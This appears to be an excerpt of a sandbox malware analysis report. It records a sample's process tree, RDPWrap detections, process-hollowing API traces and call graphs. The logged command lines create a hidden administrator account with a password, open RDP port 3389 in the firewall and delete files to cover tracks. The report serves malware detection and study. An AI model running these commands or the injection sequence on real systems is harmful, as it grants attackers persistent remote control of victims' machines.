                                                                                    • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000013.00000000.2436777725.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 47%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Target ID:21
                                                                                    Start time:18:15:15
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:18:15:15
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:18:15:15
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:timeout /t 10
                                                                                    Imagebase:0xb70000
                                                                                    File size:25'088 bytes
                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:18:15:16
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                    Imagebase:0x7ff6d0d80000
                                                                                    File size:96'768 bytes
                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:18:15:17
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff7c7de0000
                                                                                    File size:32'600 bytes
                                                                                    MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:27
                                                                                    Start time:18:15:18
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:
                                                                                    Imagebase:
                                                                                    File size:169'984 bytes
                                                                                    MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:30
                                                                                    Start time:18:15:18
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                    Wow64 process (32bit):
                                                                                    Commandline:
                                                                                    Imagebase:
                                                                                    File size:137'728 bytes
                                                                                    MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                                    Has elevated privileges:
                                                                                    Has administrator privileges:
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:33
                                                                                    Start time:18:15:30
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:34
                                                                                    Start time:18:15:30
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:35
                                                                                    Start time:18:15:30
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:net user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                                                                    Imagebase:0xb30000
                                                                                    File size:47'104 bytes
                                                                                    MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:36
                                                                                    Start time:18:15:30
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\net1 user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                                                                    Imagebase:0x520000
                                                                                    File size:139'776 bytes
                                                                                    MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:37
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c net localgroup
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:38
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:39
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:net localgroup
                                                                                    Imagebase:0xb30000
                                                                                    File size:47'104 bytes
                                                                                    MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:40
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\net1 localgroup
                                                                                    Imagebase:0x520000
                                                                                    File size:139'776 bytes
                                                                                    MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:41
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:42
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:43
                                                                                    Start time:18:15:31
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                    Imagebase:0x1560000
                                                                                    File size:82'432 bytes
                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:44
                                                                                    Start time:18:15:32
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c net localgroup "Administrators" RDPUser_fec8106a /add
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:45
                                                                                    Start time:18:15:32
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:46
                                                                                    Start time:18:15:32
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:net localgroup "Administrators" RDPUser_fec8106a /add
                                                                                    Imagebase:0xb30000
                                                                                    File size:47'104 bytes
                                                                                    MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:47
                                                                                    Start time:18:15:32
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\net1 localgroup "Administrators" RDPUser_fec8106a /add
                                                                                    Imagebase:0x520000
                                                                                    File size:139'776 bytes
                                                                                    MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:48
                                                                                    Start time:18:15:33
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:49
                                                                                    Start time:18:15:33
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:50
                                                                                    Start time:18:15:33
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:net localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                                                                    Imagebase:0xb30000
                                                                                    File size:47'104 bytes
                                                                                    MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:51
                                                                                    Start time:18:15:33
                                                                                    Start date:26/09/2024
                                                                                    Path:C:\Windows\SysWOW64\net1.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_fec8106a /add
                                                                                    Imagebase:0x520000
                                                                                    File size:139'776 bytes
                                                                                    MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:34.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:40%
                                                                                      Total number of Nodes:15
                                                                                      Total number of Limit Nodes:0

                                                                                      Callgraph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      • Opacity -> Relevance
                                                                                      • Disassembly available
                                                                                      callgraph 0 Function_00ED046D 1 Function_00ED0469 2 Function_00ED08E8 3 Function_00ED0165 4 Function_00ED01E5 5 Function_00ED0465 6 Function_00ED00E4 7 Function_00ED0461 8 Function_00ED12E1 9 Function_00ED0260 10 Function_00ED0060 11 Function_00ED0479 12 Function_00ED04F9 13 Function_00ED0178 14 Function_00ED01F8 15 Function_00ED0475 16 Function_00ED04F5 17 Function_00ED0AF7 52 Function_00ED0B29 17->52 18 Function_00ED0471 19 Function_00ED04F1 20 Function_00ED0070 21 Function_00ED00F0 22 Function_00ED0270 23 Function_00ED004D 24 Function_00ED054D 25 Function_00ED11CC 25->9 26 Function_00ED0148 27 Function_00ED00C8 28 Function_00ED0848 29 Function_00ED0244 30 Function_00ED0444 31 Function_00ED11C6 32 Function_00ED04C1 33 Function_00ED05C1 63 Function_00ED083F 33->63 34 Function_00ED0C40 34->9 35 Function_00ED0540 36 Function_00ED01C0 37 Function_00ED045D 38 Function_00ED105C 38->9 39 Function_00ED0559 40 Function_02D42463 41 Function_00ED01D5 42 Function_00ED0555 43 Function_00ED0154 44 Function_00ED00D4 45 Function_00ED0254 46 Function_00ED04D7 47 Function_00ED1056 48 Function_00ED0551 49 Function_00ED0450 50 Function_00ED012C 51 Function_00ED05AF 51->63 53 Function_00ED0528 53->9 54 Function_00ED01A8 55 Function_02D41D13 56 Function_00ED10A5 56->9 57 Function_00ED0224 58 Function_00ED1220 59 Function_00ED00A0 60 Function_00ED04BD 61 Function_00ED00BC 62 Function_00ED013C 64 Function_02D41F86 65 Function_00ED04B9 66 Function_00ED0534 66->9 67 Function_00ED01B4 68 Function_00ED0234 69 Function_00ED00B0 70 Function_00ED0BB0 71 Function_00ED010C 72 Function_00ED048F 73 Function_00ED050F 74 Function_00ED058F 74->51 74->63 75 Function_00ED0988 75->17 75->34 75->35 75->52 75->53 75->58 75->66 81 Function_00ED051C 75->81 84 Function_00ED1218 75->84 76 Function_00ED0188 77 Function_00ED0208 78 Function_00ED0006 79 Function_00ED0100 80 Function_00ED0080 82 Function_00ED011C 83 Function_00ED0198 85 Function_00ED0214 86 Function_02D4212D 87 Function_00ED0090

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02D4209F,02D4208F), ref: 02D4229C
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02D422AF
                                                                                      • Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 02D422CD
                                                                                      • ReadProcessMemory.KERNELBASE(0000009C,?,02D420E3,00000004,00000000), ref: 02D422F1
                                                                                      • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 02D4231C
                                                                                      • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 02D42374
                                                                                      • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 02D423BF
                                                                                      • WriteProcessMemory.KERNELBASE(0000009C,-00000008,?,00000004,00000000), ref: 02D423FD
                                                                                      • Wow64SetThreadContext.KERNEL32(000000A0,01030000), ref: 02D42439
                                                                                      • ResumeThread.KERNELBASE(000000A0), ref: 02D42448
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1731336374.0000000002D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2d41000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                      • API String ID: 2687962208-1257834847
                                                                                      • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                      • Instruction ID: 8d8451c58c9b14b9a758715e3ca2c15fb046eb03320942661d308702772d29f9
                                                                                      • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                      • Instruction Fuzzy Hash: CBB1E67664024AAFDB60CFA8CC80BDA77A5FF88714F158564EA0CAB341D774FA41CB94

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 38 ed0c40-ed0c9b 42 ed0c9d-ed0cb6 38->42 43 ed0d07-ed0d15 38->43 52 ed0f0d-ed0f87 42->52 57 ed0cbc-ed0cdd 42->57 44 ed0d1b 43->44 45 ed0da4-ed0db7 43->45 49 ed0d1e-ed0d23 44->49 47 ed0dbd-ed0dc6 45->47 48 ed0f03-ed0f0a 45->48 50 ed0dcf-ed0dda 47->50 51 ed0dc8-ed0dce 47->51 49->52 53 ed0d29-ed0d39 49->53 50->52 55 ed0de0-ed0dec 50->55 51->50 75 ed0f89-ed0fae 52->75 76 ed0fdb-ed1027 52->76 53->52 56 ed0d3f-ed0d4b 53->56 58 ed0dee-ed0df4 55->58 59 ed0df5-ed0dfc 55->59 61 ed0d4d-ed0d53 56->61 62 ed0d54-ed0d5b 56->62 57->52 64 ed0ce3-ed0cf1 57->64 58->59 59->52 65 ed0e02-ed0e0c 59->65 61->62 62->52 63 ed0d61-ed0d6b 62->63 63->52 66 ed0d71-ed0d7b 63->66 64->52 67 ed0cf7-ed0d05 64->67 65->52 69 ed0e12-ed0e1c 65->69 66->52 70 ed0d81-ed0d87 66->70 67->42 67->43 69->52 71 ed0e22-ed0e28 69->71 70->52 72 ed0d8d-ed0d9e 70->72 71->52 74 ed0e2e-ed0e3a 71->74 72->45 72->49 74->52 77 ed0e40-ed0e51 74->77 75->76 82 ed0fb0-ed0fb2 75->82 90 ed1029-ed102f 76->90 91 ed1030-ed1068 76->91 78 ed0e5a-ed0eb4 77->78 79 ed0e53-ed0e59 77->79 105 ed0ee5-ed0eea 78->105 106 ed0eb6-ed0ec0 78->106 79->78 84 ed0fd5-ed0fd8 82->84 85 ed0fb4-ed0fbe 82->85 84->76 87 ed0fc0 85->87 88 ed0fc2-ed0fd1 85->88 87->88 88->88 92 ed0fd3 88->92 90->91 97 ed1078 91->97 98 ed106a-ed106e 91->98 92->84 102 ed1079 97->102 98->97 100 ed1070-ed1073 call ed0260 98->100 100->97 102->102 110 ed0ef1-ed0efd 105->110 106->105 107 ed0ec2-ed0eda 106->107 107->105 108 ed0edc-ed0ee3 107->108 108->110 110->47 110->48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1730950638.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_ed0000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db099f4af4738ec115f628e51b7a63cde01c556720f86861985000e835bbf067
                                                                                      • Instruction ID: 71a86b82f4b3974e39fd6eff79274a0b284b56907d1baf0d49d26fc32348066f
                                                                                      • Opcode Fuzzy Hash: db099f4af4738ec115f628e51b7a63cde01c556720f86861985000e835bbf067
                                                                                      • Instruction Fuzzy Hash: 77D15970A042599BCB15CBA8C8807ADBBF2EB48314F289566E455F7396C734AD82CB94

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 23 ed1218-ed12ad VirtualProtectEx 27 ed12af 23->27 28 ed12b4-ed12d5 23->28 27->28
                                                                                      APIs
                                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00ED12A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1730950638.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_ed0000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 902b43b51291e1fe72d5783e1cc43356b32950ebc97a10a4155791ea7f21ee69
                                                                                      • Instruction ID: b06833b48fe5aecdf590b7d5baa08a577743cf9d08f42079124b83a43c3310a3
                                                                                      • Opcode Fuzzy Hash: 902b43b51291e1fe72d5783e1cc43356b32950ebc97a10a4155791ea7f21ee69
                                                                                      • Instruction Fuzzy Hash: 192133B1C002599FCB10DFAAC880ADEFBF0FF88320F10852AE959A3250C7359944CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 31 ed1220-ed12ad VirtualProtectEx 34 ed12af 31->34 35 ed12b4-ed12d5 31->35 34->35
                                                                                      APIs
                                                                                      • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00ED12A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1730950638.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_ed0000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 9690ad60df8c17d957101a38cf2b9a06dcc833790f7a887d273ac73123bbe0f1
                                                                                      • Instruction ID: 70e7df915075783b48b95cb65fd348a3579197e5fe08d7995524992e1dde0c16
                                                                                      • Opcode Fuzzy Hash: 9690ad60df8c17d957101a38cf2b9a06dcc833790f7a887d273ac73123bbe0f1
                                                                                      • Instruction Fuzzy Hash: 682110B19002599FCB10DFAAC980ADEFBF4FF88310F10842AE959A7250C775A944CFA5

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.7%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:3.8%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:30
                                                                                      execution_graph 79705 6c11b830 79706 6c11b83b 79705->79706 79707 6c11b86e dllmain_crt_process_detach 79705->79707 79708 6c11b860 dllmain_crt_process_attach 79706->79708 79709 6c11b840 79706->79709 79707->79709 79708->79709 79710 6c11b9c0 79711 6c11b9c9 79710->79711 79712 6c11b9ce dllmain_dispatch 79710->79712 79714 6c11bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 79711->79714 79714->79712 79715 6c11b694 79716 6c11b6a0 ___scrt_is_nonwritable_in_current_image 79715->79716 79745 6c11af2a 79716->79745 79718 6c11b6a7 79719 6c11b6d1 79718->79719 79720 6c11b796 79718->79720 79739 6c11b6ac ___scrt_is_nonwritable_in_current_image 79718->79739 79749 6c11b064 79719->79749 79762 6c11b1f7 IsProcessorFeaturePresent 79720->79762 79723 6c11b6e0 __RTC_Initialize 79723->79739 79752 6c11bf89 InitializeSListHead 79723->79752 79724 6c11b7b3 ___scrt_uninitialize_crt __RTC_Initialize 79725 6c11b79d ___scrt_is_nonwritable_in_current_image 79725->79724 79728 6c11b7d2 79725->79728 79729 6c11b828 79725->79729 79727 6c11b6ee ___scrt_initialize_default_local_stdio_options 79730 6c11b6f3 _initterm_e 79727->79730 79766 6c11b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 79728->79766 79733 6c11b1f7 ___scrt_fastfail 6 API calls 79729->79733 79731 6c11b708 79730->79731 79730->79739 79753 6c11b072 79731->79753 79734 6c11b82f 79733->79734 79741 6c11b83b 79734->79741 79742 6c11b86e dllmain_crt_process_detach 79734->79742 79736 6c11b7d7 79767 6c11bf95 __std_type_info_destroy_list 79736->79767 79737 6c11b70d 79737->79739 79740 6c11b711 _initterm 79737->79740 79740->79739 79743 6c11b860 dllmain_crt_process_attach 79741->79743 79744 6c11b840 79741->79744 79742->79744 79743->79744 79746 6c11af33 79745->79746 79768 6c11b341 IsProcessorFeaturePresent 79746->79768 79748 6c11af3f ___scrt_uninitialize_crt 79748->79718 79769 6c11af8b 79749->79769 79751 6c11b06b 79751->79723 79752->79727 79754 6c11b077 ___scrt_release_startup_lock 79753->79754 79755 6c11b082 79754->79755 79756 6c11b07b 79754->79756 79759 6c11b087 _configure_narrow_argv 79755->79759 79779 6c11b341 IsProcessorFeaturePresent 79756->79779 79758 6c11b080 79758->79737 79760 6c11b092 79759->79760 79761 6c11b095 _initialize_narrow_environment 79759->79761 79760->79737 79761->79758 79763 6c11b20c ___scrt_fastfail 79762->79763 79764 6c11b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 79763->79764 79765 6c11b302 ___scrt_fastfail 79764->79765 79765->79725 79766->79736 79767->79724 79768->79748 79770 6c11af9a 79769->79770 79771 6c11af9e 79769->79771 79770->79751 79772 6c11b028 79771->79772 79773 6c11afab ___scrt_release_startup_lock 79771->79773 79774 6c11b1f7 ___scrt_fastfail 6 API calls 79772->79774 79776 6c11afb8 _initialize_onexit_table 79773->79776 79778 6c11afd6 79773->79778 79775 6c11b02f 79774->79775 79777 6c11afc7 _initialize_onexit_table 79776->79777 79776->79778 79777->79778 79778->79751 79779->79758 79780 41848d 79781 418494 79780->79781 79784 41d016 79781->79784 79783 4184a9 79785 41d020 IsDebuggerPresent 79784->79785 79786 41d01e 79784->79786 79792 41d975 79785->79792 79786->79783 79789 41d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 79790 41d485 GetCurrentProcess TerminateProcess 79789->79790 79791 41d47d __call_reportfault 79789->79791 79790->79783 79791->79790 79792->79789 79793 6c0e3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 79798 6c11ab2a 79793->79798 79797 6c0e30db 79802 6c11ae0c _crt_atexit _register_onexit_function 79798->79802 79800 6c0e30cd 79801 6c11b320 5 API calls ___raise_securityfailure 79800->79801 79801->79797 79802->79800 79803 6c0e35a0 79804 6c0e3846 __aulldiv 79803->79804 79805 6c0e35c4 InitializeCriticalSectionAndSpinCount getenv 79803->79805 79820 6c11b320 5 API calls ___raise_securityfailure 79804->79820 79806 6c0e38fc 